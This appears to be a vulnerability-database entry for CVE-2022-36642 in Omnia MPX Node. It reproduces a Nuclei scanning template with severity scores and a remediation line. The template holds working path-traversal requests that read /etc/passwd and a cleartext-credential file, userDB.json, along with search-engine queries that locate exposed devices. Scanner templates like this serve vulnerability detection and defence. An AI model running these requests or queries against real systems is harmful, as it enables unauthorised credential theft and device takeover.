Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-36642
HistorySep 03, 2022 - 12:07 p.m.

Omnia MPX 1.5.0+r1 - Local File Inclusion

2022-09-0312:07:26
ProjectDiscovery
github.com
6
telos alliance
omnia mpx node
local file inclusion
traversal
exploit-db
cve-2022-36642

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.725 High

EPSS

Percentile

98.1%

Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.
id: CVE-2022-36642

info:
  name: Omnia MPX 1.5.0+r1 - Local File Inclusion
  author: arafatansari,ritikchaddha,For3stCo1d
  severity: critical
  description: |
    Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX.
  reference:
    - https://www.exploit-db.com/exploits/50996
    - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36642
    - https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-36642
    cwe-id: CWE-862
    epss-score: 0.68515
    epss-percentile: 0.97692
    cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: telosalliance
    product: omnia_mpx_node_firmware
    shodan-query:
      - http.title:"Omnia MPX Node | Login"
      - http.title:"omnia mpx node | login"
    fofa-query: title="omnia mpx node | login"
    google-query: intitle:"omnia mpx node | login"
  tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance

http:
  - method: GET
    path:
      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"password":'
          - '"mustChangePwd":'
          - '"roleUser":'
        condition: and

      - type: regex
        regex:
          - "root:[x*]:0:0"
# digest: 4b0a00483046022100fb67ad5efa2b3c91fc4ae6c7d6677945af45ab39f1185dd060186a3e82f7eee2022100df5485efbb4388fb389a231c1a8a36bebe5f9ed83eb741dd0f231b0c8c2eb6a6:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.725 High

EPSS

Percentile

98.1%

Related for NUCLEI:CVE-2022-36642